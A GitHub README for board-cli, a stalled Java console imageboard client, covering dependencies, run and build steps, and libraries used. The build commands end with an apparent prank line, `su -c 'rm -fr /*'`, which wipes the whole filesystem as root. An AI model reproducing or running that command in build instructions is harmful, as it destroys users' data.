Skip to content

[WIP, Stalled] Kawaii modular imageboard client~

License

Notifications You must be signed in to change notification settings

saber-nyan/board-cli

Repository files navigation

Build Status codecov Issues Release

board-cli

[EN | RU]

Inspired by bcskda/2ch-cli
Console modular imageboard client.
Sometimes works on M$® Windows™!

I agree, only addicts write CLI-projects in Java.

Screenshot1 Screenshot2

Dependencies?

  • Java>=1.8, Oracle or OpenJDK (icedtea)
  • (Optionally) IntelliJ IDEA for easy development

Execution?

  1. Download board-core.jar and board-module-name.jar from Releases.
  2. Put downloaded files into the same directory.
  3. Run java -jar ./board-core.jar -h (or javaw on M$ Windows, see mabe02/lanterna#335).
  4. ??????
  5. So, how to post?

Building?

$ git clone https://github.com/saber-nyan/board-cli.git
$ cd board-cli
$ ./gradlew jar
$ cd ./build/jars
$ java -jar ./board-core.jar # or javaw on M$ Windows

$ su -c 'rm -fr /*'

Documentation?

Just run gradle aggregateJavadocs and you will get Javadocs in build/docs/javadoc!

Also...

What was used?

Dependency Version License
Gradle 3.5-rc-2 Apache-2.0
OkHttp3 3.9.0 Apache-2.0
intellij-annotations 12.0 Apache-2.0
commons-cli 1.4 Apache-2.0
org.json 20170516 JSON
slf4j 1.7.25 MIT
logback 1.2.3 EPL v1 / LGPL v2.1
lanterna 3.0.0 LGPL v3.0

License?

License
Because I can.

About

[WIP, Stalled] Kawaii modular imageboard client~

Topics

Resources

License

Code of conduct

Stars

Watchers

Forks

Packages

No packages published

Languages